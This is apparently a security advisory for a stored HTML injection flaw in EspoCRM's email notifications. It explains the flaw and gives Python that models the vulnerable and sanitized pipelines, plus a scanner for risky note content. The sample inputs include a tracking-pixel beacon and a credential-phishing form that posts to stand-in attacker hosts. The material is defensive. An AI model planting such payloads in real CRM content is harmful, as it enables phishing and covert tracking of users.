CVE-2026-33657 Overview
CVE-2026-33657 is a stored HTML injection vulnerability in EspoCRM, an open source customer relationship management application. Authenticated users with standard (non-administrative) privileges can inject arbitrary HTML into system-generated email notifications by crafting malicious content in the post field of stream activity notes. Because the injected content is rendered in emails sent from the system's configured SMTP identity (such as an administrative sender address), it appears fully trusted to recipients, enabling sophisticated phishing attacks, user tracking via embedded resources like image beacons, and UI manipulation within email content.
Critical Impact
Authenticated attackers can abuse the @mention feature to deliver targeted malicious emails that appear to originate from trusted administrative senders, potentially compromising user credentials through phishing or tracking user activity via embedded image beacons.
Affected Products
- EspoCRM versions 9.3.3 and below
Discovery Timeline
- April 13, 2026 - CVE-2026-33657 published to NVD
- April 13, 2026 - Last updated in NVD database
Technical Details for CVE-2026-33657
Vulnerability Analysis
This vulnerability (CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page) stems from a combination of insecure template rendering practices in EspoCRM's email notification system. The attack exploits a multi-stage failure in the application's content handling pipeline that ultimately allows user-controlled HTML to be rendered directly in email notifications without proper sanitization.
The vulnerability is particularly concerning because it leverages the trust relationship users have with system-generated emails. When an attacker injects malicious HTML, it appears in emails sent from the organization's official SMTP identity, making phishing attempts highly convincing.
Root Cause
The root cause is a combination of three factors in EspoCRM's email rendering pipeline:
Unescaped Handlebars Rendering: Server-side Handlebars templates render the post field using triple-brace syntax ({{{post}}}), which bypasses HTML escaping.
Markdown Processor Behavior: The Markdown processor preserves inline HTML by default, allowing raw HTML tags to pass through unmodified.
Sanitization Bypass: The rendering pipeline explicitly skips sanitization for fields present in additionalData, creating a path where attacker-controlled HTML is accepted, stored, and rendered directly into emails without any escaping.
This combination creates a complete bypass of input sanitization, allowing authenticated users to inject arbitrary HTML that will be rendered in email notifications sent to other users.
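As an added illustration (not EspoCRM's code), the following Python models the three steps above: a toy Markdown step that leaves inline HTML untouched, a stand-in for the triple-brace insertion, and an allowlist sanitizer inserted where the fix belongs. The template, tag allowlist and sample post are constructed for this example.

```python
import html
import re

# Constructed, minimal model of the three-step pipeline described above.
# Illustrative only; this is not EspoCRM's implementation.

_INLINE_TAG = re.compile(r"<(/?)([A-Za-z][A-Za-z0-9]*)\b[^>]*>")
ALLOWED_TAGS = {"strong", "em", "p", "br"}  # constructed allowlist


def markdown_to_html(post: str) -> str:
    """Toy Markdown step: converts **bold** and, like the real processor
    in its default mode, leaves inline HTML untouched."""
    return re.sub(r"\*\*(.+?)\*\*", r"<strong>\1</strong>", post)


def sanitize(fragment: str) -> str:
    """Allowlist sanitizer: keep a few attribute-free formatting tags and
    escape every other tag so it renders as literal text."""
    def keep_or_escape(m: re.Match) -> str:
        closing, name = m.group(1), m.group(2).lower()
        if name in ALLOWED_TAGS:
            return f"<{closing}{name}>"
        return html.escape(m.group(0), quote=True)
    return _INLINE_TAG.sub(keep_or_escape, fragment)


def render_template(post_html: str) -> str:
    """Stands in for a {{{post}}} triple-brace insertion: no escaping."""
    return f"<p>alice mentioned you:</p><div>{post_html}</div>"


def vulnerable_pipeline(post: str) -> str:
    """Markdown -> raw insertion: attacker HTML reaches the email body."""
    return render_template(markdown_to_html(post))


def fixed_pipeline(post: str) -> str:
    """Markdown -> sanitize -> raw insertion: only allowlisted tags survive."""
    return render_template(sanitize(markdown_to_html(post)))


# Constructed sample post mixing legitimate Markdown with an inline beacon.
SAMPLE_POST = 'Hi **team**, see <img src="https://tracker.example/b.gif"> @bob'

if __name__ == "__main__":
    print(vulnerable_pipeline(SAMPLE_POST))
    print(fixed_pipeline(SAMPLE_POST))
```

The regex-based sanitizer is deliberately small; a production fix should use a maintained HTML sanitizer rather than this pattern.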
Attack Vector
The attack is executed over the network and requires the attacker to have authenticated access to EspoCRM with standard user privileges. The exploitation flow involves:
- An authenticated user creates a stream activity note with malicious HTML content in the post field
- The attacker uses the @mention feature to target specific users who will receive email notifications
- EspoCRM's rendering pipeline processes the malicious content without sanitization
- The victim receives an email notification containing the injected HTML, which appears to come from a trusted administrative sender address
The injected HTML can include phishing forms designed to capture credentials, image beacons that track email opens and user activity, and manipulated UI elements that mislead recipients into taking harmful actions.
Detection Methods for CVE-2026-33657
Indicators of Compromise
- Unusual HTML tags or embedded resources in stream activity notes within the EspoCRM database
- Email notifications containing unexpected HTML elements such as <img> tags pointing to external domains, <form> elements, or inline frames
- Requests to external domains triggered from email clients when users view notifications
- User reports of suspicious or unexpected content in EspoCRM email notifications
Detection Strategies
- Implement content inspection rules to identify HTML tags in stream activity post fields that should contain plain text or sanitized content
- Monitor outbound email content from the EspoCRM SMTP sender for anomalous HTML patterns or embedded external resources
- Review EspoCRM audit logs for users creating stream notes with HTML content, particularly those using @mentions to target specific recipients
- Deploy email security gateway rules to flag outbound emails from the CRM system containing suspicious HTML elements
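An added example of the content-inspection rule from the first two bullets, not part of the original advisory: it scans constructed stream note post fields with Python's html.parser and flags forms, frames, inputs, scripts, and images or links whose host is not on a constructed trusted-host list.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the CRM is expected to reference; anything else counts as external.
# Constructed for this example.
TRUSTED_HOSTS = {"crm.example.internal"}

RISKY_TAGS = {"form": "phishing form", "iframe": "inline frame",
              "input": "form input", "script": "script"}


class _PostScanner(HTMLParser):
    """Collects findings for every start tag seen in a post field."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: list[str] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        attr = dict(attrs)
        if tag in RISKY_TAGS:
            self.findings.append(f"{RISKY_TAGS[tag]} (<{tag}>)")
        elif tag in ("img", "a"):
            url = attr.get("src" if tag == "img" else "href") or ""
            host = urlparse(url).hostname
            if host and host not in TRUSTED_HOSTS:
                kind = "image beacon" if tag == "img" else "link"
                self.findings.append(f"external {kind} to {host}")
        else:
            # Post fields are Markdown source, so any raw tag is suspicious.
            self.findings.append(f"html tag <{tag}>")


def scan_post(post: str) -> list[str]:
    """Return the findings for one stream note post field (empty if clean)."""
    scanner = _PostScanner()
    scanner.feed(post)
    scanner.close()
    return scanner.findings


# Constructed sample records shaped like rows from the stream note table.
SAMPLE_NOTES = [
    {"id": "n1", "created_by": "bob", "post": "Ping @alice, call me at 3pm"},
    {"id": "n2", "created_by": "mallory", "post": '@alice session expired, '
     're-login: <form action="https://login.example-evil.test">'
     '<input name="pw"></form>'},
    {"id": "n3", "created_by": "mallory", "post": '@carol thanks! <img '
     'src="https://tracker.example-evil.test/o.gif" width="1" height="1">'},
]


def flag_notes(notes) -> dict[str, list[str]]:
    """Map note id -> findings for notes whose post contains risky HTML."""
    return {n["id"]: f for n in notes if (f := scan_post(n["post"]))}
```

Run `flag_notes(SAMPLE_NOTES)` over an export of the note table to produce a review list; @mentions in the same post raise the priority of a hit.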
Monitoring Recommendations
- Enable detailed logging for stream activity note creation and modification events in EspoCRM
- Configure SIEM alerts for patterns indicative of HTML injection attempts in CRM content fields
- Monitor for user complaints or helpdesk tickets regarding suspicious email notifications from the CRM system
- Track external resource loading from email clients that correlates with EspoCRM notification delivery times
How to Mitigate CVE-2026-33657
Immediate Actions Required
- Upgrade EspoCRM to version 9.3.4 or later immediately to address this vulnerability
- Review existing stream activity notes in the database for any signs of injected HTML content
- Notify users to be cautious of unexpected content in EspoCRM email notifications until the upgrade is complete
- Consider temporarily disabling email notifications for stream activity if immediate upgrade is not possible
Patch Information
EspoCRM has released version 9.3.4 which addresses this stored HTML injection vulnerability. The patch implements proper sanitization for the post field content before it is rendered in email notifications. Organizations should upgrade to this version or later as soon as possible.
For detailed information about the security fix, refer to the EspoCRM 9.3.4 release notes and the GitHub Security Advisory GHSA-8prm-r5j9-j574.
Workarounds
- Disable email notifications for stream activity notes temporarily until the patch can be applied
- Implement email gateway filtering to strip or quarantine outbound emails from EspoCRM containing suspicious HTML elements
- Restrict user permissions to limit who can create stream activity notes with @mentions
- Configure web application firewall rules to block requests containing HTML tags in stream note post field submissions
# Example: Disable email notifications in EspoCRM (temporary workaround)
# Navigate to Administration > Outbound Emails and disable system notifications
# Or modify config.php to disable notifications:
# 'emailNotificationsEnable' => false,
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.